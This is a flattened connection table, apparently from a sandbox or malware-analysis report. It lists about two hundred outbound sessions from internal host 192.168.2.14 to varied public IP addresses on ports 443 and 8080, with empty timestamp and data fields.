                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11326192.168.2.14373904.181.96.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11327192.168.2.145061059.95.27.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11328192.168.2.1435970176.216.71.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11329192.168.2.144745088.240.233.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11330192.168.2.143863020.124.248.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11331192.168.2.145012042.204.48.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11332192.168.2.1441944136.238.108.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11333192.168.2.1439102223.228.69.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11334192.168.2.1453882137.43.33.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11335192.168.2.144627067.92.16.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11336192.168.2.1457146152.233.207.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11337192.168.2.144708459.205.181.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11338192.168.2.1453058169.171.51.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11339192.168.2.1452110207.174.58.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11340192.168.2.14578428.38.143.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11341192.168.2.1447004121.57.84.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11342192.168.2.144273680.115.111.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11343192.168.2.14541965.109.164.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11344192.168.2.1459428102.120.88.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11345192.168.2.1450662207.227.127.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11346192.168.2.1439312221.3.64.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11347192.168.2.145417075.143.133.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11348192.168.2.1448314120.231.90.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11349192.168.2.146045896.153.16.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11350192.168.2.145608289.117.230.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11351192.168.2.1432992109.176.42.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11352192.168.2.1434684105.125.112.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11353192.168.2.144439072.232.91.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11354192.168.2.1460008142.250.57.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11355192.168.2.14342868.124.83.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11356192.168.2.143976288.206.38.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11357192.168.2.1437752108.115.240.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11358192.168.2.1452204163.136.77.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11359192.168.2.145835085.3.13.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11360192.168.2.145190284.124.127.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11361192.168.2.14529568.141.237.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11362192.168.2.144626882.127.35.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11363192.168.2.1458004154.41.178.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11364192.168.2.1452544190.221.146.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11365192.168.2.1450692222.230.107.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11366192.168.2.1453360133.138.207.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11367192.168.2.143990263.17.69.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11368192.168.2.1436046126.109.227.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11369192.168.2.145750671.150.125.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11370192.168.2.145339289.138.27.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11371192.168.2.145098835.29.96.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11372192.168.2.1446506149.167.144.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11373192.168.2.1453216105.222.35.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11374192.168.2.1436182130.71.19.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11375192.168.2.1440632111.57.143.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11376192.168.2.1447112197.236.229.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11377192.168.2.144102060.114.190.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11378192.168.2.1446100136.63.87.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11379192.168.2.1447224146.85.64.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11380192.168.2.1454520196.203.183.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11381192.168.2.1442250122.187.125.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11382192.168.2.1443862146.87.24.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11383192.168.2.1452016159.7.53.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11384192.168.2.144395245.225.227.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11385192.168.2.1442466186.11.88.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11386192.168.2.1458472132.203.171.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11387192.168.2.1434900139.175.78.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11388192.168.2.145702437.226.108.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11389192.168.2.143518291.225.146.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11390192.168.2.144353054.22.206.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11391192.168.2.1438118105.20.59.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11392192.168.2.1446040176.223.58.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11393192.168.2.144590249.190.170.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11394192.168.2.1459604131.24.235.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11395192.168.2.1455340103.1.123.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11396192.168.2.143644680.210.201.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11397192.168.2.1440460133.251.225.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11398192.168.2.1434874204.98.19.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11399192.168.2.145807483.43.176.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11400192.168.2.1452392177.4.151.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11401192.168.2.1456264205.68.163.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11402192.168.2.1446076108.78.8.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11403192.168.2.1446350148.4.205.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11404192.168.2.144645812.192.131.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11405192.168.2.1434576208.218.158.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11406192.168.2.1454302147.132.235.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11407192.168.2.145505449.143.193.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11408192.168.2.1447942157.12.222.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11409192.168.2.1447978221.255.17.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11410192.168.2.1456728111.32.191.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11411192.168.2.1449798175.254.214.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11412192.168.2.1445988145.138.70.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11413192.168.2.145146891.107.48.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11414192.168.2.1449434184.243.127.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11415192.168.2.143436048.87.232.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11416192.168.2.145318644.54.228.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11417192.168.2.145161075.147.117.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11418192.168.2.144924076.48.113.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11419192.168.2.1456626166.141.105.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11420192.168.2.145501691.250.53.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11421192.168.2.145334223.250.85.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11422192.168.2.144332259.49.175.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11423192.168.2.144101046.191.111.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11424192.168.2.1447634130.57.150.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11425192.168.2.143501288.63.151.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11426192.168.2.1446306168.58.92.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11427192.168.2.1452582221.30.162.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11428192.168.2.1457288223.166.28.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11429192.168.2.1460764171.171.152.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11430192.168.2.144139417.34.219.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11431192.168.2.1439928169.105.91.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11432192.168.2.145039037.3.44.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11433192.168.2.1459846221.135.209.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11434192.168.2.1450776106.28.239.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11435192.168.2.146034232.24.139.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11436192.168.2.1455916121.251.239.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11437192.168.2.1443522134.255.156.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11438192.168.2.1449962181.160.235.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11439192.168.2.144522085.121.172.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11440192.168.2.1453042183.253.77.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11441192.168.2.1436358151.34.209.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11442192.168.2.144437088.143.52.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11443192.168.2.145840013.225.63.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11444192.168.2.1437502176.4.20.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11445192.168.2.1460634182.224.71.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11446192.168.2.1455066178.41.221.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11447192.168.2.1441552166.179.198.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11448192.168.2.1436176190.46.173.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11449192.168.2.1439270211.84.131.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11450192.168.2.145639895.0.5.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11451192.168.2.1460192134.146.241.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11452192.168.2.1444198220.224.45.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11453192.168.2.1458228118.8.240.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11454192.168.2.1435368181.113.112.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11455192.168.2.1459804217.240.16.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11456192.168.2.1442344142.29.19.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11457192.168.2.143438878.88.243.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11458192.168.2.143682632.34.10.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11459192.168.2.1440806151.120.77.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11460192.168.2.1455520205.103.163.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11461192.168.2.1457648170.119.41.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11462192.168.2.1456450218.162.194.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11463192.168.2.144876668.169.8.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11464192.168.2.1456350132.171.178.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11465192.168.2.14517824.17.200.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11466192.168.2.14571902.214.46.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11467192.168.2.1447818212.222.17.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11468192.168.2.143803681.104.54.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11469192.168.2.1438112223.169.203.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11470192.168.2.1444552143.52.0.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11471192.168.2.1436466145.23.76.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11472192.168.2.1455350217.223.51.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11473192.168.2.1450864137.253.49.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11474192.168.2.1447912205.154.72.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11475192.168.2.1450114109.36.151.2278080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11476192.168.2.1444912203.138.53.1338080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11477192.168.2.143921034.149.103.248080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11478192.168.2.1459050156.238.15.718080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11479192.168.2.143966854.205.188.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11480192.168.2.1440942104.163.207.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11481192.168.2.1447040159.57.8.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11482192.168.2.1439142198.60.180.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11483192.168.2.145322296.123.75.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11484192.168.2.1436414195.139.130.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11485192.168.2.1438666168.213.79.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11486192.168.2.145032258.194.228.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11487192.168.2.144467837.134.35.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11488192.168.2.1451478194.128.69.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11489192.168.2.1447272173.67.184.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11490192.168.2.1451068203.118.111.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11491192.168.2.144274050.207.44.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11492192.168.2.1436816173.222.186.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11493192.168.2.1448332189.240.18.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11494192.168.2.1460150207.6.80.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11495192.168.2.145263027.155.183.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11496192.168.2.1443770148.51.187.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11497192.168.2.145235431.87.137.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11498192.168.2.1434904194.57.135.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11499192.168.2.1457430130.136.100.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11500192.168.2.1438848206.132.226.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11501192.168.2.1442434134.64.75.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11502192.168.2.1436418157.75.192.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11503192.168.2.144568861.243.124.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11504192.168.2.144045067.51.161.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11505192.168.2.143374467.171.76.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11506192.168.2.1450646177.231.18.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11507192.168.2.1445752183.251.206.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11508192.168.2.143717897.153.230.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11509192.168.2.1443830191.40.103.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11510192.168.2.143417899.159.121.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11511192.168.2.144975419.174.233.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11512192.168.2.1452246105.126.21.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11513192.168.2.144986241.229.32.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11514192.168.2.1456272110.144.224.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11515192.168.2.145203688.188.247.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11516192.168.2.1455650102.180.215.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11517192.168.2.144180480.90.190.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11518192.168.2.14478125.55.155.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11519192.168.2.1444254143.158.135.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11520192.168.2.145168073.173.235.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11521192.168.2.1437018193.178.11.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11522192.168.2.1450166145.22.46.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11523192.168.2.1446740133.123.14.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11524192.168.2.145871631.99.94.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11525192.168.2.144447247.41.58.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11526192.168.2.1438346104.153.170.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11527192.168.2.1450228134.184.174.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11528192.168.2.1448392136.187.138.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11529192.168.2.1442304212.172.203.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11530192.168.2.1453844147.193.80.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11531192.168.2.144299472.243.190.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11532192.168.2.145209072.17.84.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11533192.168.2.1459564141.16.43.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11534192.168.2.1435620108.109.2.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11535192.168.2.14454448.173.206.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11536192.168.2.1448476112.253.171.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11537192.168.2.1459376125.20.162.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
